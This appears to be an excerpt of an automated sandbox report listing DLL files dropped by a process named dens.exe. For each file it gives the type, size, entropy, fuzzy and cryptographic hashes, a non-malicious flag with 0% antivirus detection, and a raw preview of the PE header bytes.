                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):265216
                                                                                                                                                                                                                                            Entropy (8bit):6.191152939315957
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6144:DV3x6M84atBFS7PFhzBr9tYPpYWEp1+t8RfFP:DV3zsK7tpeWWEp1+t8h
                                                                                                                                                                                                                                            MD5:8E4CDED9429EC06C8F681EA0AFA3BB93
                                                                                                                                                                                                                                            SHA1:5EA5F8525FF4B49CB68712BBC94B9CEF0D1E5784
                                                                                                                                                                                                                                            SHA-256:CF70C494EC7087114A84412B8BD4E9EE7F60A2716DF8D73252BF56B24A72FD9E
                                                                                                                                                                                                                                            SHA-512:1B4B0C2F7785F6294441663B319FE2F0A5D5AAE582552E4E7DD90E68DC6DA430C53EB12A413A26A652D7BA79F4761436AD26D7CFC202E17BF99678AD0FC73E52
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........p=...SY..SY..SY.i.Y..SYS.RX..SY.iRX..SY..RX..SY..RY{.SYS.PX..SYS.WX..SYS.VX..SY..[X..SY..SX..SY...Y..SY..QX..SYRich..SY................PE..d......f.........." ...(.,...........-....................................................`.................................................t...x....`.......@...............p..\...P...................................@............@...............................text...H*.......,.................. ..`.rdata..J....@.......0..............@..@.data....@..........................@....pdata.......@......................@..@.rsrc........`......................@..@.reloc..\....p......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):50176
                                                                                                                                                                                                                                            Entropy (8bit):5.798799669841864
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:DNfYLojawVodMUvJai7e0qO0QlySYkbwlh2BN/zfrXW0XwgJYd:DIEawVzUBanpO0QnXN7frXW43JYd
                                                                                                                                                                                                                                            MD5:E37DE249124DAF6FD5164B7CFB8B7FE1
                                                                                                                                                                                                                                            SHA1:521EC4C8AADD4981A4A46ADB2BF50877289AF854
                                                                                                                                                                                                                                            SHA-256:8A13B94B85D917D25CB8A6EA5D99CC82A39E9DD1618CB71E6A9219AADB76C5C3
                                                                                                                                                                                                                                            SHA-512:06FC956E04BA01CEF1FD3F3EE891F20975FDCAAA3E9B40BFA35D431AA1FB356E344B8BCCC9991010D12C3E5C355FF72AA782A31C309DD1F04AC9680DBD750BF5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7.T.V...V...V....4..V..-...V.......V..-...V..-...V..-...V......V...V..}V......V......V....X..V......V..Rich.V..........................PE..d.../..f.........." ...(.|..........@~.......................................P............`.............................................h...h...d....0....... ...............@......................................@...@...............P............................text....z.......|.................. ..`.rdata..R0.......2..................@..@.data....N..........................@....pdata....... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):37376
                                                                                                                                                                                                                                            Entropy (8bit):5.661337019469485
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:hrfL0VnUOhYKe/XgWr/r8XkyjcX0JKHQr4:VEUOJePxr/2k5HQr4
                                                                                                                                                                                                                                            MD5:D0965116CBF816EC3DC7F960F47A63BA
                                                                                                                                                                                                                                            SHA1:96AB646981FB9C902DF80044BDAA7990D8362CD9
                                                                                                                                                                                                                                            SHA-256:6C9338D5FE59ED8721209FD58C6CAF7EB38F8695F1448914664E63E489D63958
                                                                                                                                                                                                                                            SHA-512:96E6171159CC21D19C43C50C5B8C1D1410E152055F333DA988FC854901BA9B06F91C6BBE9E528D63E5CC3C2AAB19890C6DF48178BD63477EDC0C6A826865DA7F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7.Z.V...V...V....4..V..%...V.......V..%...V..%...V..%...V......V...V..oV......V......V....X..V......V..Rich.V..........PE..d...+..f.........." ...(.P...D...... S....................................................`..........................................{..d....|..d...................................Ps...............................r..@............`...............................text...xO.......P.................. ..`.rdata...*...`...,...T..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):22112
                                                                                                                                                                                                                                            Entropy (8bit):4.744270711412692
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:zFOhcWqhWpvWEXCVWQ4iWwklRxwVIX01k9z3AROVaz4ILS:zFlWqhWpk6R9zeU0J2
                                                                                                                                                                                                                                            MD5:E8B9D74BFD1F6D1CC1D99B24F44DA796
                                                                                                                                                                                                                                            SHA1:A312CFC6A7ED7BF1B786E5B3FD842A7EEB683452
                                                                                                                                                                                                                                            SHA-256:B1B3FD40AB437A43C8DB4994CCFFC7F88000CC8BB6E34A2BCBFF8E2464930C59
                                                                                                                                                                                                                                            SHA-512:B74D9B12B69DB81A96FC5A001FD88C1E62EE8299BA435E242C5CB2CE446740ED3D8A623E1924C2BC07BFD9AEF7B2577C9EC8264E53E5BE625F4379119BAFCC27
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....dZ..........." .........0...............................................@............`A........................................p...,............0...............0..`&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):22120
                                                                                                                                                                                                                                            Entropy (8bit):4.602255667966723
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:NWqhWEWEXCVWQ4cRWvBQrVXC4dlgX01k9z3AUj7W6SxtR:NWqhWPlZVXC4deR9zVj7QR
                                                                                                                                                                                                                                            MD5:CFE0C1DFDE224EA5FED9BD5FF778A6E0
                                                                                                                                                                                                                                            SHA1:5150E7EDD1293E29D2E4D6BB68067374B8A07CE6
                                                                                                                                                                                                                                            SHA-256:0D0F80CBF476AF5B1C9FD3775E086ED0DFDB510CD0CC208EC1CCB04572396E3E
                                                                                                                                                                                                                                            SHA-512:B0E02E1F19CFA7DE3693D4D63E404BDB9D15527AC85A6D492DB1128BB695BFFD11BEC33D32F317A7615CB9A820CD14F9F8B182469D65AF2430FFCDBAD4BD7000
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....N7.........." .........0...............................................@............`A........................................p................0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):22120
                                                                                                                                                                                                                                            Entropy (8bit):4.606873381830854
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:T0WqhWnWEXCVWQ4mW5ocADB6ZX01k9z3AkprGvV:T0WqhW8VcTR9zJpr4V
                                                                                                                                                                                                                                            MD5:33BBECE432F8DA57F17BF2E396EBAA58
                                                                                                                                                                                                                                            SHA1:890DF2DDDFDF3EECCC698312D32407F3E2EC7EB1
                                                                                                                                                                                                                                            SHA-256:7CF0944901F7F7E0D0B9AD62753FC2FE380461B1CCE8CDC7E9C9867C980E3B0E
                                                                                                                                                                                                                                            SHA-512:619B684E83546D97FC1D1BC7181AD09C083E880629726EE3AF138A9E4791A6DCF675A8DF65DC20EDBE6465B5F4EAC92A64265DF37E53A5F34F6BE93A5C2A7AE5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....IL..........." .........0...............................................@...........`A........................................p................0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):22136
                                                                                                                                                                                                                                            Entropy (8bit):4.65169290018864
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:qzmxD3T4qLWqhW2WJWadJCsVWQ4mW/xNVAv+cQ0GX01k9z3ARoanSwT44:qzQVWqhWTCsiNbZR9zQoUSwTJ
                                                                                                                                                                                                                                            MD5:EB0978A9213E7F6FDD63B2967F02D999
                                                                                                                                                                                                                                            SHA1:9833F4134F7AC4766991C918AECE900ACFBF969F
                                                                                                                                                                                                                                            SHA-256:AB25A1FE836FC68BCB199F1FE565C27D26AF0C390A38DA158E0D8815EFE1103E
                                                                                                                                                                                                                                            SHA-512:6F268148F959693EE213DB7D3DB136B8E3AD1F80267D8CBD7D5429C021ADACCC9C14424C09D527E181B9C9B5EA41765AFF568B9630E4EB83BFC532E56DFE5B63
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d................." .........0...............................................@............`A........................................p................0...............0..x&..............p............................................................................rdata..H...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):26216
                                                                                                                                                                                                                                            Entropy (8bit):4.866487428274293
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:gaNYPvVX8rFTsCWqhWVWEXCVWQ4mWPJlBLrp0KBQfX01k9z3ALkBw:WPvVX8WqhWiyBRxB+R9z2kBw
                                                                                                                                                                                                                                            MD5:EFAD0EE0136532E8E8402770A64C71F9
                                                                                                                                                                                                                                            SHA1:CDA3774FE9781400792D8605869F4E6B08153E55
                                                                                                                                                                                                                                            SHA-256:3D2C55902385381869DB850B526261DDEB4628B83E690A32B67D2E0936B2C6ED
                                                                                                                                                                                                                                            SHA-512:69D25EDF0F4C8AC5D77CB5815DFB53EAC7F403DC8D11BFE336A545C19A19FFDE1031FA59019507D119E4570DA0D79B95351EAC697F46024B4E558A0FF6349852
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....(............" .........@...............................................P......z.....`A........................................p................@...............@..h&..............p............................................................................rdata..|........ ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):22136
                                                                                                                                                                                                                                            Entropy (8bit):4.619913450163593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:iDGaWqhWhWJWadJCsVWQ4mWd9afKUSIX01k9z3AEXzAU9:i6aWqhWACs92IR9z5EU9
                                                                                                                                                                                                                                            MD5:1C58526D681EFE507DEB8F1935C75487
                                                                                                                                                                                                                                            SHA1:0E6D328FAF3563F2AAE029BC5F2272FB7A742672
                                                                                                                                                                                                                                            SHA-256:EF13DCE8F71173315DFC64AB839B033AB19A968EE15230E9D4D2C9D558EFEEE2
                                                                                                                                                                                                                                            SHA-512:8EDB9A0022F417648E2ECE9E22C96E2727976332025C3E7D8F15BCF6D7D97E680D1BF008EB28E2E0BD57787DCBB71D38B2DEB995B8EDC35FA6852AB1D593F3D1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....RS.........." .........0...............................................@......;.....`A........................................p...L............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):18696
                                                                                                                                                                                                                                            Entropy (8bit):7.054510010549814
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:eVrW1hWbvm0GftpBjzH4m3S9gTlUK3dsl:eVuAViaB/6sl
                                                                                                                                                                                                                                            MD5:BFFFA7117FD9B1622C66D949BAC3F1D7
                                                                                                                                                                                                                                            SHA1:402B7B8F8DCFD321B1D12FC85A1EE5137A5569B2
                                                                                                                                                                                                                                            SHA-256:1EA267A2E6284F17DD548C6F2285E19F7EDB15D6E737A55391140CE5CB95225E
                                                                                                                                                                                                                                            SHA-512:B319CC7B436B1BE165CDF6FFCAB8A87FE29DE78F7E0B14C8F562BE160481FB5483289BD5956FDC1D8660DA7A3F86D8EEDE35C6CC2B7C3D4C852DECF4B2DCDB7F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d...4.F>.........." .........................................................0............`.........................................`................ ...................=..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):22136
                                                                                                                                                                                                                                            Entropy (8bit):4.625331165566263
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:qzWqhWxWJWadJCsVWQ4mW8RJLNVAv+cQ0GX01k9z3ARo8ef3uBJu:qzWqhWwCsjNbZR9zQoEzu
                                                                                                                                                                                                                                            MD5:E89CDCD4D95CDA04E4ABBA8193A5B492
                                                                                                                                                                                                                                            SHA1:5C0AEE81F32D7F9EC9F0650239EE58880C9B0337
                                                                                                                                                                                                                                            SHA-256:1A489E0606484BD71A0D9CB37A1DC6CA8437777B3D67BFC8C0075D0CC59E6238
                                                                                                                                                                                                                                            SHA-512:55D01E68C8C899E99A3C62C2C36D6BCB1A66FF6ECD2636D2D0157409A1F53A84CE5D6F0C703D5ED47F8E9E2D1C9D2D87CC52585EE624A23D92183062C999B97E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....Hb..........." .........0...............................................@............`A........................................p...`............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):22136
                                                                                                                                                                                                                                            Entropy (8bit):4.737397647066978
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:OdxlZWqhWcWJWadJCsVWQ4mWlhtFyttuX01k9z3A2oD:OdxlZWqhWpCsctkSR9zfoD
                                                                                                                                                                                                                                            MD5:ACCC640D1B06FB8552FE02F823126FF5
                                                                                                                                                                                                                                            SHA1:82CCC763D62660BFA8B8A09E566120D469F6AB67
                                                                                                                                                                                                                                            SHA-256:332BA469AE84AA72EC8CCE2B33781DB1AB81A42ECE5863F7A3CB5A990059594F
                                                                                                                                                                                                                                            SHA-512:6382302FB7158FC9F2BE790811E5C459C5C441F8CAEE63DF1E09B203B8077A27E023C4C01957B252AC8AC288F8310BCEE5B4DCC1F7FC691458B90CDFAA36DCBE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....B.l.........." .........0...............................................@.......A....`A........................................p................0...............0..x&..............p............................................................................rdata..|...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):22120
                                                                                                                                                                                                                                            Entropy (8bit):4.6569647133331316
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:dwWqhWWWEXCVWQ4mWLnySfKUSIX01k9z3AEXz5SLaDa3:iWqhWJhY2IR9z5YLt3
                                                                                                                                                                                                                                            MD5:C6024CC04201312F7688A021D25B056D
                                                                                                                                                                                                                                            SHA1:48A1D01AE8BC90F889FB5F09C0D2A0602EE4B0FD
                                                                                                                                                                                                                                            SHA-256:8751D30DF554AF08EF42D2FAA0A71ABCF8C7D17CE9E9FF2EA68A4662603EC500
                                                                                                                                                                                                                                            SHA-512:D86C773416B332945ACBB95CBE90E16730EF8E16B7F3CCD459D7131485760C2F07E95951AEB47C1CF29DE76AFFEB1C21BDF6D8260845E32205FE8411ED5EFA47
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...}.o..........." .........0...............................................@......v.....`A........................................p................0...............0..h&..............p............................................................................rdata..L...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):22120
                                                                                                                                                                                                                                            Entropy (8bit):4.882042129450427
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:9TvuBL3BBLAWqhWUWEXCVWQ4iWgdCLVx6RMySX01k9z3AzaXQ+BB:9TvuBL3BaWqhW/WSMR9zqaP
                                                                                                                                                                                                                                            MD5:1F2A00E72BC8FA2BD887BDB651ED6DE5
                                                                                                                                                                                                                                            SHA1:04D92E41CE002251CC09C297CF2B38C4263709EA
                                                                                                                                                                                                                                            SHA-256:9C8A08A7D40B6F697A21054770F1AFA9FFB197F90EF1EEE77C67751DF28B7142
                                                                                                                                                                                                                                            SHA-512:8CF72DF019F9FC9CD22FF77C37A563652BECEE0708FF5C6F1DA87317F41037909E64DCBDCC43E890C5777E6BCFA4035A27AFC1AEEB0F5DEBA878E3E9AEF7B02A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....g..........." .........0...............................................@............`A........................................p................0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):22120
                                                                                                                                                                                                                                            Entropy (8bit):5.355894399765837
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:0naOMw3zdp3bwjGzue9/0jCRrndbnWqhW5lFydVXC4deR9zVj7xR:FOMwBprwjGzue9/0jCRrndbtGydVXC4O
                                                                                                                                                                                                                                            MD5:724223109E49CB01D61D63A8BE926B8F
                                                                                                                                                                                                                                            SHA1:072A4D01E01DBBAB7281D9BD3ADD76F9A3C8B23B
                                                                                                                                                                                                                                            SHA-256:4E975F618DF01A492AE433DFF0DD713774D47568E44C377CEEF9E5B34AAD1210
                                                                                                                                                                                                                                            SHA-512:19B0065B894DC66C30A602C9464F118E7F84D83010E74457D48E93AACA4422812B093B15247B24D5C398B42EF0319108700543D13F156067B169CCFB4D7B6B7C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...0.&3.........." .........0...............................................@......L0....`A........................................p................0...............0..h&..............p............................................................................rdata..D...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):22120
                                                                                                                                                                                                                                            Entropy (8bit):4.771309314175772
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:L0WqhWTWEXCVWQ4cRWdmjKDUX01k9z3AQyMX/7kn:L0WqhWol1pR9zzDY
                                                                                                                                                                                                                                            MD5:3C38AAC78B7CE7F94F4916372800E242
                                                                                                                                                                                                                                            SHA1:C793186BCF8FDB55A1B74568102B4E073F6971D6
                                                                                                                                                                                                                                            SHA-256:3F81A149BA3862776AF307D5C7FEEF978F258196F0A1BF909DA2D3F440FF954D
                                                                                                                                                                                                                                            SHA-512:C2746AA4342C6AFFFBD174819440E1BBF4371A7FED29738801C75B49E2F4F94FD6D013E002BAD2AADAFBC477171B8332C8C5579D624684EF1AFBFDE9384B8588
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...`.@f.........." .........0...............................................@......K.....`A........................................p...l............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):22136
                                                                                                                                                                                                                                            Entropy (8bit):4.7115212149950185
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:bWqhWUxWJWadJCsVWQ4mW5iFyttuX01k9z3A2EC:bWqhWUwCs8SR9zfEC
                                                                                                                                                                                                                                            MD5:321A3CA50E80795018D55A19BF799197
                                                                                                                                                                                                                                            SHA1:DF2D3C95FB4CBB298D255D342F204121D9D7EF7F
                                                                                                                                                                                                                                            SHA-256:5476DB3A4FECF532F96D48F9802C966FDEF98EC8D89978A79540CB4DB352C15F
                                                                                                                                                                                                                                            SHA-512:3EC20E1AC39A98CB5F726D8390C2EE3CD4CD0BF118FDDA7271F7604A4946D78778713B675D19DD3E1EC1D6D4D097ABE9CD6D0F76B3A7DFF53CE8D6DBC146870A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...j............" .........0...............................................@............`A........................................p................0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):22120
                                                                                                                                                                                                                                            Entropy (8bit):4.893761152454321
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:dEFP2WqhWVWEXCVWQ4mW68vx6RMySX01k9z3AzapOP:eF+WqhWi6gMR9zqa0
                                                                                                                                                                                                                                            MD5:0462E22F779295446CD0B63E61142CA5
                                                                                                                                                                                                                                            SHA1:616A325CD5B0971821571B880907CE1B181126AE
                                                                                                                                                                                                                                            SHA-256:0B6B598EC28A9E3D646F2BB37E1A57A3DDA069A55FBA86333727719585B1886E
                                                                                                                                                                                                                                            SHA-512:07B34DCA6B3078F7D1E8EDE5C639F697C71210DCF9F05212FD16EB181AB4AC62286BC4A7CE0D84832C17F5916D0224D1E8AAB210CEEFF811FC6724C8845A74FE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...L.Y..........." .........0...............................................@............`A........................................p...H............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):22136
                                                                                                                                                                                                                                            Entropy (8bit):5.231196901820079
                                                                                                                                                                                                                                            Encrypted:false
